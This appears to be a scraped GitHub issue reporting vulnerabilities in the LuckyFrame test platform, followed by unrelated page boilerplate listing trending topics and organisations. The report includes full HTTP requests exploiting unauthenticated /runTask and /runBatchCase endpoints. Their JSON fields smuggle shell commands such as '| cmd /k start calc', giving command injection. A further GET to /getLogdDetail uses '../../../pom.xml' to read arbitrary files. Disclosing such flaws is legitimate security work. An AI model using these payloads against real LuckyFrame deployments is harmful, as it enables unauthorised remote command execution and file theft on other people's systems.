LuckyFrame测试平台是一款免费开源的测试平台,最大的特点是全纬度覆盖了接口自动化、WEB UI自动化、APP自动化,并且支持分布式测试,测试关键字驱动也很大程度上解决了测试同学代码基础弱的问题。同时也集成了质量管理相关的一些功能,解决QA的日常工作中,项目过程数据的收集问题,并能展示一些简单质量报表。更多功能可以关注公众号或是访问官网了解哦。
Home Page: http://www.luckyframe.cn
License: GNU Affero General Public License v3.0
Unauthorized interface /runTask, use fastjson to decode RunTaskEntity, and directly splice the incoming parameter toString() into the execution command
springboot.HttpImpl#runTask
Objects RunTaskEntity are properties of type String, malicious commands can be injected into String properties, resulting in command injection
springboot.model.RunTaskEntity
Inject with taskId
POST /runTask HTTP/1.1
Host: 192.168.157.1:6633
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/json
Content-Length: 82
{
"schedulingName": "33",
"taskId": "| cmd /k start calc",
"loadpath": ""
}
Unauthorized interface /runBatchCase, use fastjson to decode RunBatchCaseEntity, and directly splice the incoming parameter toString() into the execution command
springboot.HttpImpl#runBatchCase
The objects RunBatchCaseEntity are properties of type String, leading to command injection
springboot.model.RunBatchCaseEntity
The attack uses batchcase
POST /runBatchCase HTTP/1.1
Host: 192.168.157.1:8090
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/json
Content-Length: 87
{
"projectname": "33",
"taskid": "22",
"batchcase": "| cmd start /k calc",
"loadpath": ""
}
客户端打包成jar包后找不到bootlog4j.conf文件
The unauthorized interface /runBatchCase directly spliced the parameter filename as the path to read the file, resulting in arbitrary file reading
springboot.HttpImpl#getLogdDetail
read pom.xml
GET /getLogdDetail?filename=../../../pom.xml
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
Django
The Web framework for perfectionists with deadlines.
Laravel
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft
Open source projects and samples from Microsoft.
Google
Google ❤️ Open Source for everyone.
Alibaba
Alibaba Open Source for everyone
D3
Data-Driven Documents codes.
Tencent
China tencent open source team.